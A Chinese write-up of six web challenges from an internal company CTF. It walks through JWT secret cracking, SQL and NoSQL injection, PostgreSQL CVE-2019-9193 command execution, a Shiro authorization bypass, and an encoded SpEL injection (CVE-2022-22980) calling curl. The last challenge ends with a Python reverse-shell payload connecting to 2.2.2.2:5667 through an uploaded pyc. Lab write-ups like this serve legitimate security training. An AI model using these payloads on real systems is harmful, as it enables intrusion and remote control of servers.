公司内部CTF的初赛web题

WriteUp 3周前 admin
76 0 0

1.    初赛——ez0day

环境为某个不出名的绩效考核系统,java写的,漏洞点较多。
首先其存在默认密码,官方自带的用户手册可以看到,所以可以直接进后台,而后台有个这么功能(非预期解)。

公司内部CTF的初赛web题

所以直接就代码执行了。。。
但是这个代码执行并不是那么完美,因为它只有第一次保存会生效。可能是环境问题当我测试时把第一次机会浪费了,因此就折腾了好久。后来要求重启服务,第一次直接上jndi,然后jndi转反序列化转tomcat内存马搞定。


认真代码审计中可发现以下漏洞。
此处上传接口未调用了checkFileType进行白名单校验,他写了白名单,写了校验方法,但就是任性不调。

公司内部CTF的初赛web题

此处任意文件下载也差不多,他写了filterFilePath方法做处理,其他下载接口均使用了,偏偏这个不用而且是个未授权接口。

公司内部CTF的初赛web题

以及一系列非常直白非常极端的未授权soap的api,可直接命令执行/读写文件

公司内部CTF的初赛web题

当然,实际环境修复了一部分,但还是比较容易拿到shell。


2.    初赛——欢迎参加CTF初赛

一个登录接口,默认用户admin,有弱口令123456,进去之后只有一个权限检测。

公司内部CTF的初赛web题

权限检测接口则存在很明显的flask-jwt的session,随便改一下可以得到报错页面。

公司内部CTF的初赛web题

没有其他思路,于是用flask-unsign解密jwt
python3 -m pip install flask-unsign
flask-unsign --decode --cookie eyJxxx.xxx.xxx

公司内部CTF的初赛web题

同样没思路,只能爆破jwt key。
sudo apt-get install libc-dev
sudo apt-get install npm
sudo npm install --global jwt-cracker
jwt-cracker "eyJxxx.xxx.xxx" "abcdefghijklmnopqrstuwxyz1234567890" 6

公司内部CTF的初赛web题

利用jwt.io官网进行cookie修改(比较方便)

公司内部CTF的初赛web题

放到原查询权限接口,发现是SQL注入。

公司内部CTF的初赛web题

有报错信息所以直接用报错注入了,反复手注,发现其实flag是最后一个用户名。
payload如下构造即可。

公司内部CTF的初赛web题

公司内部CTF的初赛web题

得到结果如上,由于报错注入只能显示31位,再往后推几位就能全部显示flag了。

3.    初赛——拳击赛

题目是个冷门web项目,开放了两个端口,除了web之外另一个端口是PostgreSQL。web很简单没漏洞,解决方法在PostgreSQL中。
找该项目在GitHub的配置文件中可发现默认密码,是个弱密码,爆破也可以得到。
由于PostgreSQL版本较高,可以直接CVE-2019-9193命令执行。
这里有个推荐的sql利用工具。
https://github.com/SafeGroceryStore/MDUT

公司内部CTF的初赛web题

明显是提权,一般简单的靶机,要么是SUID,要么是sudo。
sudo -l
sudo /var/backups/busybox1 id

最后发现flag在/root/flag中,就不截图了。

公司内部CTF的初赛web题

公司内部CTF的初赛web题


4.    初赛——冲破封锁线

一个明显的spring+shiro的登录页面,但显然不是shiro-550或者弱密码。虽然这个登录页面没有什么用,但给了这个靶场的重要提示。

公司内部CTF的初赛web题

接下来是接口爆破,swagger的页面是/swagger-ui/index.html,我字典里居然没有。

公司内部CTF的初赛web题

直接访问/customer/123/byPhone权限不够,使用/customer/123%0A/byPhone越权成功。
由于shiro出现的越权CVE实在太多,实际黑盒去测应该是很痛苦的事,可以参考下面的。
https://www.anquanke.com/post/id/240033
https://www.anquanke.com/post/id/240202
https://xz.aliyun.com/t/11633

越权之后却没有任何信息,根据mongo的提示,需要结合越权利用另外一个CVE-2022-22980。
/customer/%54%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%75%72%6c%20%69%70%2e%63%6f%6d%22%29%0A/byPhone
payload改成弹shell的即可。

5.    初赛——在线IM

很单纯的nosql注入却没几个人做的出来,是个Websocket环境,发送{'$ne':1}即可获得flag,注意不能是双引号。

公司内部CTF的初赛web题

6.    初赛——pyhub

第一次访问会给一个jwt cookie而且有提示需要admin,解出如下。

公司内部CTF的初赛web题

那么很明显是让你篡改jwt cookie,爆破如下。
python3 -m pip install flask-unsign-wordlist
flask-unsign --cookie eyJxxx.xxx --unsign

公司内部CTF的初赛web题

然后要修改cookie。
flask-unsign --sign --cookie "{'user': {'is_admin': True}}" --secret 123456 --no-literal-eval

公司内部CTF的初赛web题

至此成功访问api。

公司内部CTF的初赛web题

顺便这题我做到这里就不会了,而且这题严重影响了我对另外一题解jwt的思路,因为我想的是无论如何不可能存在两题爆破jwt密钥。
先试试上传接口

公司内部CTF的初赛web题

测试可以发现,通过控制filename="/opt/ctf/1.txt",可以上传到/opt/ctf/下已存在的任意目录。上传py文件会报错,所以正如题目所说,这是一个上传pyc文件的靶场。

pyc就是py的编译文件,在import时就会自动生成。


再来看另外一个接口/api/v2/test

公司内部CTF的初赛web题

通过报错提示可以看出来,是调用api.views2的方法。

公司内部CTF的初赛web题

这里有些误导,会让人联想到可能存在类似java一些漏洞的玩法,通过python内置attribute,去设置某些属性,达到RCE的效果,比如这样。

公司内部CTF的初赛web题

但实际上就只是单纯告诉你这个接口是调用的/opt/ctf/api/views2.pyc的test方法,只要制作并上传views3.pyc就行。
那么如何制作pyc呢?首先要在/api/version查看python版本然后使用同版本。
/usr/local/python3.6.9/bin/python3  -m compileall test.py
然后会生成
__pycache__/test.cpython-36.pyc
上传到
/opt/ctf/api/views3.pyc路径。
最后POST访问
/api/v3/test即可。
test.py内容,经过前期对/api/v2/test接口的探测,只需要传参dict,返回str即可。
反弹shell的payload制作如下。

def test(args={}):    import socket    import subprocess    import os    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)    s.connect(("2.2.2.2",5667))    os.dup2(s.fileno(),0)    os.dup2(s.fileno(),1)    os.dup2(s.fileno(),2)    p=subprocess.call(["/bin/sh","-i"])    return "ok"

而且还从POST JSON传参到args,写成命令执行或者任意文件读取的shell也很容易。

效果是这样的

公司内部CTF的初赛web题


原文始发于微信公众号(珂技知识分享):公司内部CTF的初赛web题

版权声明:admin 发表于 2023年1月11日 下午4:34。
转载请注明:公司内部CTF的初赛web题 | CTF导航

相关文章

暂无评论

暂无评论...